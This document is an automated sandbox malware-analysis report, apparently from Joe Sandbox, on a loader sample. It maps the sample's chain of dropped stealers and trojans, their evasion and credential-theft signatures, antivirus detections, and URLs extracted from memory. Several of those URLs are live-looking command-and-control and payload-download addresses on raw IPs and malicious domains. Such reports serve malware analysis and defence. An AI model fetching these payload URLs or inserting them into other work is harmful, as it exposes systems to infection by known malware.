                          Registry Run Keys / Startup Folder
                          1
                          Timestomp
                          LSA Secrets1
                          Query Registry
                          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          DLL Side-Loading
                          Cached Domain Credentials991
                          Security Software Discovery
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                          Masquerading
                          DCSync471
                          Virtualization/Sandbox Evasion
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job471
                          Virtualization/Sandbox Evasion
                          Proc Filesystem14
                          Process Discovery
                          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                          Process Injection
                          /etc/passwd and /etc/shadow1
                          Application Window Discovery
                          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                          System Owner/User Discovery
                          Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                          Remote System Discovery
                          Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1546540 Sample: file.exe Startdate: 01/11/2024 Architecture: WINDOWS Score: 100 135 Multi AV Scanner detection for domain / URL 2->135 137 Found malware configuration 2->137 139 Antivirus detection for dropped file 2->139 141 24 other signatures 2->141 10 axplong.exe 2 49 2->10         started        15 file.exe 5 2->15         started        17 axplong.exe 2->17         started        19 11 other processes 2->19 process3 dnsIp4 123 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 10->123 125 185.215.113.36 WHOLESALECONNECTIONSNL Portugal 10->125 127 162.159.133.233 CLOUDFLARENETUS United States 10->127 97 C:\Users\user\AppData\...\2dc588f7b5.exe, PE32 10->97 dropped 99 C:\Users\user\AppData\...\c8908bf20d.exe, PE32 10->99 dropped 101 C:\Users\user\AppData\Local\Temp\...\shop.exe, PE32 10->101 dropped 107 19 other malicious files 10->107 dropped 171 Creates multiple autostart registry keys 10->171 173 Hides threads from debuggers 10->173 175 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->175 21 stealc_default2.exe 34 10->21         started        26 550b7cfe5f.exe 10->26         started        28 f55899dae2.exe 10->28         started        38 5 other processes 10->38 103 C:\Users\user\AppData\Local\...\axplong.exe, PE32 15->103 dropped 105 C:\Users\user\...\axplong.exe:Zone.Identifier, ASCII 15->105 dropped 177 Detected unpacking (changes PE section rights) 15->177 179 Tries to evade debugger and weak emulator (self modifying code) 15->179 181 Tries to detect virtualization through RDTSC time measurements 15->181 183 Potentially malicious time measurement code found 15->183 30 axplong.exe 15->30         started        185 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 17->185 129 20.101.57.9 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 19->129 131 184.28.90.27 AKAMAI-ASUS United States 19->131 133 127.0.0.1 unknown unknown 19->133 187 Query firmware table information (likely to detect VMs) 19->187 189 Changes security center settings (notifications, updates, antivirus, firewall) 19->189 191 Windows Scripting host queries suspicious COM object (likely to drop second stage) 19->191 32 MpCmdRun.exe 2 19->32         started        34 EcoCraft.scr 19->34         started        36 EcoCraft.scr 19->36         started        file5 signatures6 process7 dnsIp8 113 185.215.113.17 WHOLESALECONNECTIONSNL Portugal 21->113 75 C:\Users\user\AppData\...\softokn3[1].dll, PE32 21->75 dropped 77 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 21->77 dropped 79 C:\Users\user\AppData\...\mozglue[1].dll, PE32 21->79 dropped 89 9 other files (5 malicious) 21->89 dropped 143 Antivirus detection for dropped file 21->143 145 Multi AV Scanner detection for dropped file 21->145 147 Tries to steal Mail credentials (via file / registry access) 21->147 159 7 other signatures 21->159 115 188.114.97.3 CLOUDFLARENETUS European Union 26->115 149 Detected unpacking (changes PE section rights) 26->149 151 Query firmware table information (likely to detect VMs) 26->151 153 Tries to detect sandboxes and other dynamic analysis tools (window names) 26->153 161 2 other signatures 26->161 91 2 other malicious files 28->91 dropped 155 Contains functionality to start a terminal service 28->155 163 3 other signatures 28->163 40 RegAsm.exe 28->40         started        42 RegAsm.exe 28->42         started        165 3 other signatures 30->165 44 conhost.exe 32->44         started        117 2.59.161.36 VMAGE-ASRU Russian Federation 38->117 119 1.1.1.1 CLOUDFLARENETUS Australia 38->119 121 2 other IPs or domains 38->121 81 C:\Users\user\AppData\...\service123.exe, PE32 38->81 dropped 83 C:\Users\user\...\TPKOcaeSvfBbrcMznKuF.dll, PE32 38->83 dropped 85 C:\Users\user\...\AAKAL78BRQNYOCIR09Y.exe, PE32 38->85 dropped 87 C:\Users\...\5C4X2NVYNV2E9BIIRWD89LJFJIM.exe, PE32 38->87 dropped 157 Attempt to bypass Chrome Application-Bound Encryption 38->157 167 3 other signatures 38->167 46 cmd.exe 38->46         started        50 chrome.exe 38->50         started        53 conhost.exe 38->53         started        file9 signatures10 process11 dnsIp12 109 C:\Users\user\AppData\...\Jurisdiction.pif, PE32 46->109 dropped 193 Drops PE files with a suspicious file extension 46->193 195 Uses schtasks.exe or at.exe to add and modify task schedules 46->195 55 Jurisdiction.pif 46->55         started        59 conhost.exe 46->59         started        61 tasklist.exe 46->61         started        63 7 other processes 46->63 111 239.255.255.250 unknown Reserved 50->111 file13 signatures14 process15 file16 93 C:\Users\user\AppData\Local\...coCraft.scr, PE32 55->93 dropped 95 C:\Users\user\AppData\Local\...coCraft.js, ASCII 55->95 dropped 169 Drops PE files with a suspicious file extension 55->169 65 cmd.exe 55->65         started        67 cmd.exe 55->67         started        signatures17 process18 process19 69 conhost.exe 65->69         started        71 schtasks.exe 65->71         started        73 conhost.exe 67->73         started       

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          file.exe50%ReversingLabsWin32.Packed.Themida
                          file.exe47%VirustotalBrowse
                          file.exe100%AviraTR/Crypt.TPM.Gen
                          file.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\new_v8[1].exe100%AviraHEUR/AGEN.1313486
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe100%AviraTR/AD.Stealc.cucnc
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe100%AviraTR/AD.Stealc.cucnc
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\RDX123456[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\new_v8[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe100%Joe Sandbox ML
                          C:\ProgramData\LgAmARwZ\Application.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\GOLD1234[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\shop[1].exe100%Joe Sandbox ML
                          C:\ProgramData\LgAmARwZ\Application.exe50%ReversingLabsWin32.Trojan.Generic
                          C:\ProgramData\freebl3.dll0%ReversingLabs
                          C:\ProgramData\mozglue.dll0%ReversingLabs
                          C:\ProgramData\msvcp140.dll0%ReversingLabs
                          C:\ProgramData\nss3.dll0%ReversingLabs
                          C:\ProgramData\softokn3.dll0%ReversingLabs
                          C:\ProgramData\vcruntime140.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr5%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\new_v8[1].exe79%ReversingLabsWin32.Adware.RedCap
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe39%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\RDX123456[1].exe75%ReversingLabsWin32.Trojan.MintZard
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe50%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe76%ReversingLabsWin32.Trojan.Stealerc
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\freebl3[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\mozglue[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\msvcp140[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\nss3[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe39%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\softokn3[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\splwow64[1].exe0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcruntime140[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Offnewhere[1].exe32%ReversingLabsWin32.Trojan.CryptBot
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\shop[1].exe53%ReversingLabsWin32.Packed.Generic
                          C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe76%ReversingLabsWin32.Trojan.Stealerc
                          C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe32%ReversingLabsWin32.Trojan.CryptBot
                          C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe79%ReversingLabsWin32.Adware.RedCap
                          C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe50%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe75%ReversingLabsWin32.Trojan.MintZard
                          C:\Users\user\AppData\Local\Temp\1001425001\shop.exe53%ReversingLabsWin32.Packed.Generic
                          C:\Users\user\AppData\Local\Temp\1001471001\c8908bf20d.exe39%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Local\Temp\1001472001\2dc588f7b5.exe39%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif5%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe50%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Local\Temp\5C4X2NVYNV2E9BIIRWD89LJFJIM.exe37%ReversingLabsWin32.Infostealer.Tinba
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          http://anglebug.com/46330%URL Reputationsafe
                          https://anglebug.com/73820%URL Reputationsafe
                          https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                          http://anglebug.com/69290%URL Reputationsafe
                          https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK0%URL Reputationsafe
                          https://anglebug.com/72460%URL Reputationsafe
                          https://anglebug.com/73690%URL Reputationsafe
                          https://anglebug.com/74890%URL Reputationsafe
                          https://issuetracker.google.com/1619030060%URL Reputationsafe
                          https://www.ecosia.org/newtab/0%URL Reputationsafe
                          https://lv.queniujq.cn0%URL Reputationsafe
                          https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                          http://anglebug.com/47220%URL Reputationsafe
                          https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
                          https://checkout.steampowered.com/0%URL Reputationsafe
                          https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                          http://anglebug.com/35020%URL Reputationsafe
                          http://anglebug.com/36230%URL Reputationsafe
                          http://anglebug.com/36250%URL Reputationsafe
                          http://anglebug.com/36240%URL Reputationsafe
                          https://help.steampowered.com/en/0%URL Reputationsafe
                          http://anglebug.com/38620%URL Reputationsafe
                          http://anglebug.com/48360%URL Reputationsafe
                          https://issuetracker.google.com/issues/1664752730%URL Reputationsafe
                          http://x1.c.lencr.org/00%URL Reputationsafe
                          http://x1.i.lencr.org/00%URL Reputationsafe
                          http://anglebug.com/39700%URL Reputationsafe
                          https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
                          http://anglebug.com/59010%URL Reputationsafe
                          http://anglebug.com/39650%URL Reputationsafe
                          https://anglebug.com/71610%URL Reputationsafe
                          https://anglebug.com/71620%URL Reputationsafe
                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.0%URL Reputationsafe
                          http://anglebug.com/59060%URL Reputationsafe
                          http://anglebug.com/25170%URL Reputationsafe
                          http://anglebug.com/49370%URL Reputationsafe
                          https://issuetracker.google.com/1668090970%URL Reputationsafe
                          http://anglebug.com/38320%URL Reputationsafe
                          https://api.steampowered.com/0%URL Reputationsafe
                          https://store.steampowered.com/mobile0%URL Reputationsafe
                          https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta0%URL Reputationsafe
                          https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli0%VirustotalBrowse
                          https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV0%VirustotalBrowse
                          https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&amp;l=0%VirustotalBrowse
                          http://185.215.113.17/2fb6c2cc8dce150a.phpro19%VirustotalBrowse
                          No contacted domains info
                          NameMaliciousAntivirus DetectionReputation
                          opposezmny.sitetrue
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://185.215.113.17/2fb6c2cc8dce150a.phprostealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcVnew_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            http://anglebug.com/4633chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://anglebug.com/7382chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.gstatic.cn/recaptcha/new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&amp;l=new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englinew_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            http://185.215.113.16/luma/random.exe2qaxplong.exe, 0000000D.00000002.3755340826.00000000013AF000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://185.215.113.16/Jo89Ku7d/index.phpoftaxplong.exe, 0000000D.00000002.3755340826.00000000013AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://anglebug.com/6929chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://sosipisos.cc/shop.exezKUaxplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://store.steampowere&new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLKstealc_default2.exe, 00000011.00000003.2103880354.000000002D5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://185.215.113.16/Jo89Ku7d/index.phpncodedaxplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://www.autoitscript.com/autoit3/Jsplwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000000.2135901294.0000000000349000.00000002.00000001.01000000.00000010.sdmp, EcoCraft.scr, 00000029.00000002.3749890554.00000000006A9000.00000002.00000001.01000000.00000017.sdmp, EcoCraft.scr, 0000002F.00000002.2543717342.00000000006A9000.00000002.00000001.01000000.00000017.sdmpfalse
                                        unknown
                                        https://steamcommunity.com/profiles/76561199724331900new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B51000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://anglebug.com/7246chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://anglebug.com/7369chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://anglebug.com/7489chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://185.215.113.16/216e50adc2dd0a1bfe522b3effbbd4e64e3aa636b77#axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://crl.ver)svchost.exe, 00000023.00000002.3755487168.0000029987EBF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://issuetracker.google.com/161903006chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&amp;new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://www.ecosia.org/newtab/stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://home.sevjoi17sr.top/TCQEoezkVqyvrJjqBhZs12Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                    unknown
                                                    https://lv.queniujq.cnnew_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://villagedguy.cyou/api(wsnew_v8.exe, 00000016.00000003.2853535555.0000000000BF3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2783040007.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2852199772.0000000000BED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://villagedguy.cyou:443/api4new_v8.exe, 00000016.00000003.2176713314.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2177592016.0000000000BCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://steamcommunity.com/profiles/76561199724331900bfnew_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B51000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 0000002B.00000002.2760490321.00002B3C004C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2763383332.00002B3C00734000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 0000002B.00000002.2764280996.00002B3C00830000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngnew_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://185.215.113.16/dobre/splwow64.exeaxplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://185.215.113.17/2fb6c2cc8dce150a.php5stealc_default2.exe, 00000011.00000002.2162755046.0000000000D36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://185.215.113.17/2fb6c2cc8dce150a.php)stealc_default2.exe, 00000011.00000002.2162755046.0000000000D36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
